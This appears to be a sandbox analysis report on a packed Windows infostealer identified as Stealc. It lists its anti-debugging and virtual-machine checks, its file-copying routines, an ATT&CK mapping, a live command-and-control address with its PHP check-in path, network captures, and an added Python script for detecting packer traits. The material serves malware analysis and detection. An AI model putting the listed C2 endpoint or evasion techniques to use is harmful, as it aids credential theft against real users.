Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CD0337 second address: 4CD036F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228CBCA0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F228CBCA0B6h 0x00000010 pop ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 call 00007F228CBCA0ACh 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 930A4B second address: 930A4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 921801 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 91FF4B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 92C8BD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9B5CD2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005338B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00534910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00534910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0052DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0052E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00534570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00534570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0052ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0052BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0052DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005216D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0052F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00533EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00533EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00521160 GetSystemInfo,ExitProcess,0_2_00521160
Source: file.exe, file.exe, 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware!.
Source: file.exe, 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1768903421.0000000000F45000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1768903421.0000000000F72000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13210
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13207
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13229
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13221
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13261
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005245C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_005245C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00539860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00539860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00539750 mov eax, dword ptr fs:[00000030h] | 0_2_00539750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00537850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00537850
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00539600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00539600
Source: file.exe, file.exe, 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00537B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00536920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00536920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00537850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00537850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00537A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00537A30

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1723267854.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1723267854.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix, listed per tactic column; techniques the report flagged carry their count in parentheses, the remaining entries are the matrix's unflagged cells:

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Native API (11); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus detection (Source | Detection | Scanner | Label):
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML
No Antivirus matches
No contacted domains info

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://185.215.113.206/ | true | unknown
http://185.215.113.206/e2b1563c6670f193.php | true | unknown

URLs from memory and binary strings (Name | Source | Malicious | Antivirus Detection | Reputation):
http://185.215.113.206/e2b1563c6670f193.php- | file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://185.215.113.206/e2b1563c6670f193.php/ | file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://185.215.113.206/e2b1563c6670f193.php9 | file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://185.215.113.206/e2b1563c6670f193.phpY | file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://185.215.113.206/e2b1563c6670f193.php/4 | file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://185.215.113.206/e2b1563c6670f193.php: | file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | true | unknown
http://185.215.113.206Y | file.exe, 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | false | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1542970
Start date and time: 2024-10-27 01:46:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 82
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• VT rate limit hit for: file.exe
No simulations
IP context (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.206/e2b1563c6670f193.php
No context
ASN context (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | uLV6jN2BWh.dll | malicious | Unknown | 185.215.113.217
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.947218787911007
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'865'728 bytes
MD5: a2d11b8a418d4d4f4653ffd4af70d5c7
SHA1: f3067cf41aa873f0a0b363641f7be52f3497ab4b
SHA256: de03784bad73bf146aef041c6d82e2f0e519688bcc6230f4cf88272b24b2a328
SHA512: 54f5734013bb434ca0920bf48122465f3f5a7b86c56854c462ec7ac18faa6cf05478c89f6636790b7e492f7ddab8222a8b280552b0db2918376f3166821daa29
SSDEEP: 49152:UOuNgGuyWHu49k2mPp6/on9XzsBC9faS2kwcJ8L3CA:UOcgG1WO4k2IIQ9XzNXvw8oS
TLSH: 4C8533BC85116009E04526F6A45B2BCCBE3C7B96A5E6CD8E4DC0F37C957BB16262FC24
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xaa6000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction (entry point disassembly):
jmp 00007F228CB0303Ah
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    Programming Language:
                                    • [C++] VS2010 build 30319
                                    • [ASM] VS2010 build 30319
                                    • [ C ] VS2010 build 30319
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [LNK] VS2010 build 30319
Data directories (Name | Virtual Address | Virtual Size | Is in Section):
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections (Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics):
(name not shown) | 0x1000 | 0x25b000 | 0x22800 | 66625af1cc76d6e618788137abbcdd45 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(name not shown) | 0x25e000 | 0x2a5000 | 0x200 | f3d595d52a490bb533ddc3113fe4e6f2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pbupcvvt | 0x503000 | 0x1a2000 | 0x1a1400 | 097cfcd0c486aab2ee7fb1781e615196 | False | 0.9950165471464949 | data | 7.9539107062128656 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
eseqydfj | 0x6a5000 | 0x1000 | 0x600 | 242e8eb803178e7d65a1ae3cc082d0f4 | False | 0.60546875 | data | 5.158732976472675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6a6000 | 0x3000 | 0x2200 | 0c228082a24e16240896fa6a2cb44ed3 | False | 0.05974264705882353 | DOS executable (COM) | 0.6906900422691058 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Imports (DLL | Import):
kernel32.dll | lstrcpy

That is the complete static import table: one function from one DLL. Every other API the execution graph reaches (LoadLibraryA, GetProcAddress, InternetOpenA and the rest) is resolved at run time, starting from a PEB walk at 539750, which fits the rest of the section table: the two unnamed sections have virtual sizes (0x25b000, 0x2a5000) far beyond their raw sizes (0x22800, 0x200), every code-bearing section is readable, writable and executable, and pbupcvvt is 0x1a1400 bytes at entropy 7.95. The on-disk file is a packed container that is unpacked into those sections before the stealer code runs.
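The packer indicators described above, as a static-triage routine over the report's own section table and import list. This is an added example, not code from the report or from Joe Sandbox; the section rows are transcribed from the table, while the entropy threshold, the 0x1000 section alignment, the "standard" section-name list and the sparse-import cut-off are assumptions of the example. It generalizes the observation to any section table: a section is flagged when it is writable and executable, when its virtual size exceeds what its raw bytes need after alignment (room for code written at run time), when its entropy is at or above the threshold, or when its name is empty or non-standard.

```python
"""Static triage over a PE section table and import list.

Added example, not part of the Joe Sandbox report. The section rows are
transcribed from the report; the thresholds, the 0x1000 section alignment and
the list of "standard" section names are this example's own assumptions.
"""
from __future__ import annotations

import math
from dataclasses import dataclass

# Section names a normal MSVC-linked binary is expected to carry (assumption).
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                  ".edata", ".pdata", ".tls", ".bss", ".CRT"}
SECTION_ALIGNMENT = 0x1000   # assumed; the report does not print the header value


@dataclass
class Section:
    name: str
    virtual_size: int
    raw_size: int
    entropy: float | None          # None where the report says "unknown"
    characteristics: frozenset[str]


RWX = frozenset({"INITIALIZED_DATA", "EXECUTE", "READ", "WRITE"})
RW = frozenset({"INITIALIZED_DATA", "READ", "WRITE"})

# Transcribed from the report's section table (name, VirtualSize, RawSize, entropy, flags).
SECTIONS = [
    Section("", 0x25b000, 0x22800, None, RWX),
    Section(".rsrc", 0x1000, 0x0, 0.0, RW),
    Section(".idata", 0x1000, 0x200, 0.906, RW),
    Section("", 0x2a5000, 0x200, None, RWX),
    Section("pbupcvvt", 0x1a2000, 0x1a1400, 7.954, RWX),
    Section("eseqydfj", 0x1000, 0x600, 5.159, RWX),
    Section(".taggant", 0x3000, 0x2200, 0.691, RWX),
]
IMPORTS = {"kernel32.dll": ["lstrcpy"]}   # the complete import table from the report


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def align_up(value: int, alignment: int) -> int:
    return (value + alignment - 1) // alignment * alignment


def triage_section(s: Section, packed_entropy: float = 7.0) -> list[str]:
    """Return the packer indicators one section trips (empty list means clean)."""
    tags: list[str] = []
    if {"EXECUTE", "WRITE"} <= s.characteristics:
        tags.append("rwx")
    # Virtual size beyond the aligned raw size is space reserved for code
    # that only exists after the unpacker has written it.
    if s.raw_size and s.virtual_size > align_up(s.raw_size, SECTION_ALIGNMENT):
        tags.append("unpack-slack")
    if s.entropy is not None and s.entropy >= packed_entropy:
        tags.append("high-entropy")
    if not s.name.strip():
        tags.append("no-name")
    elif s.name not in STANDARD_NAMES:
        tags.append("non-standard-name")
    return tags


def triage_imports(imports: dict[str, list[str]], min_total: int = 5) -> list[str]:
    """A near-empty import table means the real API set is resolved at run time."""
    total = sum(len(v) for v in imports.values())
    return ["sparse-imports"] if total < min_total else []


def triage(sections: list[Section], imports: dict[str, list[str]]) -> dict[str, list[str]]:
    """Map every flagged section (index and name) plus the import table to its tags."""
    report: dict[str, list[str]] = {}
    for i, s in enumerate(sections):
        tags = triage_section(s)
        if tags:
            report[f"#{i} {s.name or '<no name>'}"] = tags
    if import_tags := triage_imports(imports):
        report["imports"] = import_tags
    return report


if __name__ == "__main__":
    for key, tags in triage(SECTIONS, IMPORTS).items():
        print(f"{key:20} {', '.join(tags)}")
```

Run against the rows above, the two unnamed sections are flagged for RWX, unpack slack and a missing name, pbupcvvt for RWX and entropy, and the import table as sparse; .rsrc and .idata trip nothing. The alignment step matters: without it, .idata (0x200 raw, 0x1000 virtual) would be a false positive, since that gap is ordinary page rounding rather than reserved unpacking space.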
IDS alerts (Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol):
2024-10-27T01:47:07.638757+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP
TCP packets (Timestamp | Source Port | Dest Port | Source IP | Dest IP):
Oct 27, 2024 01:47:06.423566103 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 01:47:06.429208994 CEST | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 01:47:06.429330111 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 01:47:06.429724932 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 01:47:06.435046911 CEST | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 01:47:07.345360041 CEST | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 01:47:07.345551968 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 01:47:07.348097086 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 01:47:07.353554010 CEST | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 01:47:07.638669968 CEST | 80 | 49730 | 185.215.113.206 | 192.168.2.4
